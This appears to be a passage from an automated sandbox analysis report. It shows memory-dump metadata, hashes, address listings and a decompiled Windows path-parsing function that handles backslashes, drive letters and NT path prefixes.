                                                                  0x04a05f9e
                                                                  0x04a05fa4
                                                                  0x04a05fa6
                                                                  0x04a0638c
                                                                  0x04a06392
                                                                  0x04a063a1
                                                                  0x04a063a7
                                                                  0x04a063af
                                                                  0x04a063af
                                                                  0x04a063bd
                                                                  0x04a063d8
                                                                  0x00000000
                                                                  0x04a063d8
                                                                  0x04a05fac
                                                                  0x04a05fb2
                                                                  0x04a05fb4
                                                                  0x04a05fbd
                                                                  0x04a05fc6
                                                                  0x04a05fce
                                                                  0x04a05fd4
                                                                  0x04a05fdc
                                                                  0x04a05fec
                                                                  0x04a05fed
                                                                  0x04a05fee
                                                                  0x04a05fef
                                                                  0x04a05ff9
                                                                  0x04a05ffa
                                                                  0x04a05ffb
                                                                  0x04a05ffc
                                                                  0x04a06000
                                                                  0x04a06004
                                                                  0x04a06012
                                                                  0x04a06012
                                                                  0x04a06018
                                                                  0x04a06019
                                                                  0x04a0601a
                                                                  0x04a0601b
                                                                  0x04a0601c
                                                                  0x04a06020
                                                                  0x04a06059
                                                                  0x04a0605c
                                                                  0x04a06061
                                                                  0x04a06061
                                                                  0x04a06022
                                                                  0x04a06022
                                                                  0x04a06022
                                                                  0x04a06025
                                                                  0x04a0602a
                                                                  0x04a0602b
                                                                  0x04a06031
                                                                  0x04a06037
                                                                  0x04a06038
                                                                  0x04a0603e
                                                                  0x04a06048
                                                                  0x04a06049
                                                                  0x04a0604a
                                                                  0x04a0604b
                                                                  0x04a0604c
                                                                  0x04a0604d
                                                                  0x04a06053
                                                                  0x04a06054
                                                                  0x04a06054
                                                                  0x04a06062
                                                                  0x04a06065
                                                                  0x04a06067
                                                                  0x04a0606a
                                                                  0x04a06070
                                                                  0x04a06075
                                                                  0x04a06076
                                                                  0x04a06081
                                                                  0x04a06087
                                                                  0x04a06095
                                                                  0x04a06099
                                                                  0x04a0609e
                                                                  0x04a060a4
                                                                  0x04a060ae
                                                                  0x04a060b0
                                                                  0x04a060b3
                                                                  0x04a060b6
                                                                  0x04a060b8
                                                                  0x04a060ba
                                                                  0x04a060ba
                                                                  0x04a060ba
                                                                  0x04a060ba
                                                                  0x04a060be
                                                                  0x04a060c0
                                                                  0x04a060c5
                                                                  0x04a060c5
                                                                  0x04a060c5
                                                                  0x04a060c6
                                                                  0x04a060cd
                                                                  0x04a06114
                                                                  0x04a060cf
                                                                  0x04a060cf
                                                                  0x04a060d4
                                                                  0x04a060d5
                                                                  0x04a060da
                                                                  0x04a060db
                                                                  0x04a060e1
                                                                  0x04a060e2
                                                                  0x04a060e8
                                                                  0x04a060f8
                                                                  0x04a060fd
                                                                  0x04a060fe
                                                                  0x04a06102
                                                                  0x04a06104
                                                                  0x04a06107
                                                                  0x04a06109
                                                                  0x04a0610b
                                                                  0x04a0610b
                                                                  0x04a0610b
                                                                  0x04a0610b
                                                                  0x04a0610f
                                                                  0x04a0610f
                                                                  0x04a06117
                                                                  0x04a0611a
                                                                  0x04a0611f
                                                                  0x04a06125
                                                                  0x04a06134
                                                                  0x04a06139
                                                                  0x04a0613f
                                                                  0x04a06146
                                                                  0x04a06148
                                                                  0x04a0614b
                                                                  0x04a0614d
                                                                  0x04a0614f
                                                                  0x04a0614f
                                                                  0x04a0614f
                                                                  0x04a0614f
                                                                  0x04a06153
                                                                  0x04a06159
                                                                  0x04a06159
                                                                  0x04a0615c
                                                                  0x04a06163
                                                                  0x04a06169
                                                                  0x04a0616c
                                                                  0x04a06172
                                                                  0x04a06181
                                                                  0x04a06186
                                                                  0x04a06187
                                                                  0x04a0618b
                                                                  0x04a06191
                                                                  0x04a06195
                                                                  0x04a061a3
                                                                  0x04a061bb
                                                                  0x04a061c0
                                                                  0x04a061c3
                                                                  0x04a061cc
                                                                  0x04a061d0
                                                                  0x04a061dc
                                                                  0x04a061de
                                                                  0x04a061e1
                                                                  0x04a061e4
                                                                  0x04a061e6
                                                                  0x04a061e8
                                                                  0x04a061e8
                                                                  0x04a061e8
                                                                  0x04a061e8
                                                                  0x04a061e6
                                                                  0x04a061ec
                                                                  0x04a061f3
                                                                  0x04a06203
                                                                  0x04a06209
                                                                  0x04a0620a
                                                                  0x04a06216
                                                                  0x04a0621d
                                                                  0x04a06227
                                                                  0x04a06241
                                                                  0x04a06246
                                                                  0x04a0624c
                                                                  0x04a06257
                                                                  0x04a06259
                                                                  0x04a0625c
                                                                  0x04a0625e
                                                                  0x04a06260
                                                                  0x04a06260
                                                                  0x04a06260
                                                                  0x04a06260
                                                                  0x04a0625e
                                                                  0x04a06264
                                                                  0x04a06267
                                                                  0x04a06269
                                                                  0x04a06315
                                                                  0x04a06315
                                                                  0x04a0631b
                                                                  0x04a0631e
                                                                  0x04a06324
                                                                  0x04a06327
                                                                  0x04a0632f
                                                                  0x04a06330
                                                                  0x04a06333
                                                                  0x04a0633a
                                                                  0x04a0633c
                                                                  0x04a06335
                                                                  0x04a06335
                                                                  0x04a06335
                                                                  0x04a0633f
                                                                  0x04a06342
                                                                  0x04a0634c
                                                                  0x04a06352
                                                                  0x04a06355
                                                                  0x04a06355
                                                                  0x04a06359
                                                                  0x00000000
                                                                  0x04a0626f
                                                                  0x04a06275
                                                                  0x04a06275
                                                                  0x04a06278
                                                                  0x04a0627e
                                                                  0x04a0627e
                                                                  0x04a06281
                                                                  0x04a06287
                                                                  0x04a0628d
                                                                  0x04a06298
                                                                  0x04a0629c
                                                                  0x04a062a2
                                                                  0x04a0629e
                                                                  0x04a0629e
                                                                  0x04a0629e
                                                                  0x04a062a7
                                                                  0x04a062a7
                                                                  0x04a062aa
                                                                  0x04a062b0
                                                                  0x04a062f0
                                                                  0x04a062f0
                                                                  0x04a062f2
                                                                  0x04a062f8
                                                                  0x04a062fd
                                                                  0x04a062b2
                                                                  0x04a062b2
                                                                  0x04a062b2
                                                                  0x04a062b5
                                                                  0x04a062dd
                                                                  0x04a062e2
                                                                  0x04a062e5
                                                                  0x04a062b7
                                                                  0x04a062b8
                                                                  0x04a062bb
                                                                  0x04a062bd
                                                                  0x04a062c0
                                                                  0x04a062c4
                                                                  0x04a062cd
                                                                  0x04a062cd
                                                                  0x04a062c0
                                                                  0x04a062bb
                                                                  0x04a062b5
                                                                  0x04a06302
                                                                  0x04a06303
                                                                  0x04a06305
                                                                  0x04a06305
                                                                  0x04a06305
                                                                  0x04a0630c
                                                                  0x04a0630c
                                                                  0x00000000
                                                                  0x04a0627e
                                                                  0x04a06269
                                                                  0x04a05eac
                                                                  0x04a05ebb
                                                                  0x04a05ebe
                                                                  0x04a05ecb
                                                                  0x04a05ecb
                                                                  0x04a05ece
                                                                  0x04a05ece
                                                                  0x04a05ed4
                                                                  0x04a05ed7
                                                                  0x04a05ed9
                                                                  0x04a05edb
                                                                  0x04a05edb
                                                                  0x04a05ee1
                                                                  0x04a05ee1
                                                                  0x04a05ee3
                                                                  0x04a05f20
                                                                  0x04a05f20
                                                                  0x04a05ee5
                                                                  0x04a05ee5
                                                                  0x04a05ee5
                                                                  0x04a05ee8
                                                                  0x04a05f11
                                                                  0x04a05f18
                                                                  0x04a05eea
                                                                  0x04a05eea
                                                                  0x04a05eed
                                                                  0x04a05ef2
                                                                  0x04a05ef8
                                                                  0x04a05efb
                                                                  0x04a05f0a
                                                                  0x04a05f0a
                                                                  0x04a05eed
                                                                  0x04a05ee8
                                                                  0x04a05f22
                                                                  0x04a05f28
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05f30
                                                                  0x04a05f31
                                                                  0x04a05f37
                                                                  0x04a05f3a
                                                                  0x04a05f3d
                                                                  0x04a05f44
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05f46
                                                                  0x04a05f48
                                                                  0x04a05f4d
                                                                  0x00000000
                                                                  0x04a05f4d
                                                                  0x04a05dda
                                                                  0x04a05ddf
                                                                  0x00000000
                                                                  0x04a05ddf
                                                                  0x04a05dd8
                                                                  0x04a05da7
                                                                  0x04a05da9
                                                                  0x04a05dac
                                                                  0x04a05dae
                                                                  0x00000000
                                                                  0x04a05db4
                                                                  0x04a05db4
                                                                  0x00000000
                                                                  0x04a05db4
                                                                  0x04a05dae
                                                                  0x04a05d88
                                                                  0x04a05d8d
                                                                  0x04a06363
                                                                  0x04a06369
                                                                  0x04a0636a
                                                                  0x04a06370
                                                                  0x04a06372
                                                                  0x04a0637a
                                                                  0x04a0637b
                                                                  0x04a0637d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a0637f
                                                                  0x04a06385
                                                                  0x00000000
                                                                  0x04a06385
                                                                  0x04a05d38
                                                                  0x04a05d3b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05d3b
                                                                  0x04a05d27
                                                                  0x04a05d29
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a06360
                                                                  0x00000000
                                                                  0x04a06360
                                                                  0x04a05c10
                                                                  0x04a05c10
                                                                  0x04a063da
                                                                  0x04a063e5
                                                                  0x04a063e5

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dae9ac88439820605c06d243499cfdb72bce2426d8a515966418ecb3da025a5b
                                                                  • Instruction ID: 5ab0dd57da76aed64cb4c6fdfdc4cdd602367c0dc2332946ff4c57355232a6fe
                                                                  • Opcode Fuzzy Hash: dae9ac88439820605c06d243499cfdb72bce2426d8a515966418ecb3da025a5b
                                                                  • Instruction Fuzzy Hash: 55424C75E00229DFDB24CF68D880BA9B7B1FF49304F14C1AAD94DAB281E774A995CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04954120, Relevance: .4, Instructions: 444COMMONCrypto
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 92%
                                                                  			E04954120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4a2d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0496F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04956E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04954620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04956E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M049545F8))) {
												case 0:
													_v568 = 0x4911078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x49111c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04954620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0497F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0497F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E049352A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0494EB70(1, 0x4a279a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0494AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E049795D0();
																			L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0497B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04973D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0497B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                  0x04954128
                                                                  0x04954135
                                                                  0x0495413c
                                                                  0x04954141
                                                                  0x04954145
                                                                  0x04954147
                                                                  0x0495414e
                                                                  0x04954151
                                                                  0x04954159
                                                                  0x0495415c
                                                                  0x04954160
                                                                  0x04954164
                                                                  0x04954168
                                                                  0x0495416c
                                                                  0x0495417f
                                                                  0x04954181
                                                                  0x0495446a
                                                                  0x0495446a
                                                                  0x0495418c
                                                                  0x04954195
                                                                  0x04954199
                                                                  0x04954432
                                                                  0x04954439
                                                                  0x0495443d
                                                                  0x04954442
                                                                  0x04954447
                                                                  0x00000000
                                                                  0x0495419f
                                                                  0x049541a3
                                                                  0x049541b1
                                                                  0x049541b9
                                                                  0x049541bd
                                                                  0x049545db
                                                                  0x049545db
                                                                  0x00000000
                                                                  0x049541c3
                                                                  0x049541c3
                                                                  0x049541ce
                                                                  0x049541d4
                                                                  0x0499e138
                                                                  0x0499e13e
                                                                  0x0499e169
                                                                  0x0499e16d
                                                                  0x0499e19e
                                                                  0x0499e16f
                                                                  0x0499e16f
                                                                  0x0499e175
                                                                  0x0499e179
                                                                  0x0499e18f
                                                                  0x0499e193
                                                                  0x00000000
                                                                  0x0499e199
                                                                  0x00000000
                                                                  0x0499e199
                                                                  0x0499e193
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049541da
                                                                  0x049541da
                                                                  0x049541df
                                                                  0x049541e4
                                                                  0x049541ec
                                                                  0x04954203
                                                                  0x04954207
                                                                  0x0499e1fd
                                                                  0x04954222
                                                                  0x04954226
                                                                  0x0499e1f3
                                                                  0x0499e1f3
                                                                  0x0495422c
                                                                  0x0495422c
                                                                  0x04954233
                                                                  0x0499e1ed
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04954239
                                                                  0x04954239
                                                                  0x04954239
                                                                  0x04954239
                                                                  0x04954233
                                                                  0x04954226
                                                                  0x049541ee
                                                                  0x049541ee
                                                                  0x049541f4
                                                                  0x04954575
                                                                  0x0499e1b1
                                                                  0x0499e1b1
                                                                  0x00000000
                                                                  0x0495457b
                                                                  0x0495457b
                                                                  0x04954582
                                                                  0x0499e1ab
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04954588
                                                                  0x04954588
                                                                  0x0495458c
                                                                  0x0499e1c4
                                                                  0x0499e1c4
                                                                  0x00000000
                                                                  0x04954592
                                                                  0x04954592
                                                                  0x04954599
                                                                  0x0499e1be
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0495459f
                                                                  0x0495459f
                                                                  0x049545a3
                                                                  0x0499e1d7
                                                                  0x0499e1e4
                                                                  0x00000000
                                                                  0x049545a9
                                                                  0x049545a9
                                                                  0x049545b0
                                                                  0x0499e1d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049545b6
                                                                  0x049545b6
                                                                  0x049545b6
                                                                  0x00000000
                                                                  0x049545b6
                                                                  0x049545b0
                                                                  0x049545a3
                                                                  0x04954599
                                                                  0x0495458c
                                                                  0x04954582
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049541f4
                                                                  0x0495423e
                                                                  0x04954241
                                                                  0x049545c0
                                                                  0x049545c4
                                                                  0x00000000
                                                                  0x049545ca
                                                                  0x049545ca
                                                                  0x00000000
                                                                  0x0499e207
                                                                  0x0499e20f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049545d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049545ca
                                                                  0x00000000
                                                                  0x04954247
                                                                  0x04954247
                                                                  0x04954247
                                                                  0x04954249
                                                                  0x04954249
                                                                  0x04954249
                                                                  0x04954251
                                                                  0x04954251
                                                                  0x04954257
                                                                  0x0495425f
                                                                  0x0495426e
                                                                  0x04954270
                                                                  0x0495427a
                                                                  0x0499e219
                                                                  0x0499e219
                                                                  0x04954280
                                                                  0x04954282
                                                                  0x04954456
                                                                  0x049545ea
                                                                  0x00000000
                                                                  0x049545f0
                                                                  0x0499e223
                                                                  0x00000000
                                                                  0x0499e223
                                                                  0x0495445c
                                                                  0x0495445c
                                                                  0x00000000
                                                                  0x0495445c
                                                                  0x00000000
                                                                  0x04954288
                                                                  0x0495428c
                                                                  0x0499e298
                                                                  0x04954292
                                                                  0x04954292
                                                                  0x0495429e
                                                                  0x049542a3
                                                                  0x049542a7
                                                                  0x049542ac
                                                                  0x0499e22d
                                                                  0x049542b2
                                                                  0x049542b2
                                                                  0x049542b9
                                                                  0x049542bc
                                                                  0x049542c2
                                                                  0x049542ca
                                                                  0x049542cd
                                                                  0x049542cd
                                                                  0x049542d4
                                                                  0x0495433f
                                                                  0x0495433f
                                                                  0x049542d6
                                                                  0x049542d6
                                                                  0x049542d9
                                                                  0x049542dd
                                                                  0x049542eb
                                                                  0x0499e23a
                                                                  0x049542f1
                                                                  0x04954305
                                                                  0x0495430d
                                                                  0x04954315
                                                                  0x04954318
                                                                  0x0495431f
                                                                  0x04954322
                                                                  0x0495432e
                                                                  0x0495433b
                                                                  0x0495433b
                                                                  0x00000000
                                                                  0x0495432e
                                                                  0x049542eb
                                                                  0x0495434c
                                                                  0x0495434e
                                                                  0x04954352
                                                                  0x04954359
                                                                  0x0495435e
                                                                  0x04954361
                                                                  0x0495436e
                                                                  0x0495438a
                                                                  0x0495438e
                                                                  0x04954396
                                                                  0x0495439e
                                                                  0x049543a1
                                                                  0x049543ad
                                                                  0x049543bb
                                                                  0x049543bb
                                                                  0x049543ad
                                                                  0x0495436e
                                                                  0x049543bf
                                                                  0x049543c5
                                                                  0x04954463
                                                                  0x04954463
                                                                  0x049543ce
                                                                  0x049543d5
                                                                  0x049543d9
                                                                  0x049543df
                                                                  0x04954475
                                                                  0x04954479
                                                                  0x04954491
                                                                  0x04954491
                                                                  0x04954479
                                                                  0x049543e5
                                                                  0x049543eb
                                                                  0x049543f4
                                                                  0x049543f6
                                                                  0x049543f9
                                                                  0x049543fc
                                                                  0x049543ff
                                                                  0x049544e8
                                                                  0x049544ed
                                                                  0x049544f3
                                                                  0x0499e247
                                                                  0x00000000
                                                                  0x049544f9
                                                                  0x04954504
                                                                  0x04954508
                                                                  0x0495450f
                                                                  0x0499e269
                                                                  0x00000000
                                                                  0x04954515
                                                                  0x04954519
                                                                  0x04954531
                                                                  0x04954534
                                                                  0x04954537
                                                                  0x0495453e
                                                                  0x04954541
                                                                  0x0495454a
                                                                  0x0499e255
                                                                  0x0499e255
                                                                  0x0499e25b
                                                                  0x0499e25e
                                                                  0x0499e261
                                                                  0x0499e261
                                                                  0x04954555
                                                                  0x04954559
                                                                  0x0495455d
                                                                  0x0499e26d
                                                                  0x0499e270
                                                                  0x0499e274
                                                                  0x0499e27a
                                                                  0x0499e27d
                                                                  0x0499e28e
                                                                  0x0499e28e
                                                                  0x04954563
                                                                  0x04954563
                                                                  0x04954569
                                                                  0x04954569
                                                                  0x00000000
                                                                  0x0495455d
                                                                  0x0495450f
                                                                  0x00000000
                                                                  0x049544f3
                                                                  0x049543ff
                                                                  0x04954405
                                                                  0x04954405
                                                                  0x04954405
                                                                  0x049542ac
                                                                  0x0495428c
                                                                  0x04954282
                                                                  0x04954407
                                                                  0x0495440d
                                                                  0x0499e2af
                                                                  0x0499e2af
                                                                  0x04954413
                                                                  0x04954413
                                                                  0x00000000
                                                                  0x049541d4
                                                                  0x00000000
                                                                  0x049541c3
                                                                  0x049541bd
                                                                  0x04954415
                                                                  0x04954415
                                                                  0x04954416
                                                                  0x04954417
                                                                  0x04954429
                                                                  0x0495416e
                                                                  0x0495416e
                                                                  0x04954175
                                                                  0x04954498
                                                                  0x0495449f
                                                                  0x0499e12d
                                                                  0x00000000
                                                                  0x0499e133
                                                                  0x00000000
                                                                  0x0499e133
                                                                  0x049544a5
                                                                  0x049544a5
                                                                  0x049544aa
                                                                  0x00000000
                                                                  0x049544bb
                                                                  0x049544ca
                                                                  0x049544d6
                                                                  0x049544d7
                                                                  0x049544d8
                                                                  0x049544e3
                                                                  0x049544e3
                                                                  0x049544aa
                                                                  0x0495417b
                                                                  0x0495417b
                                                                  0x0495417b
                                                                  0x00000000
                                                                  0x0495417b
                                                                  0x04954175
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
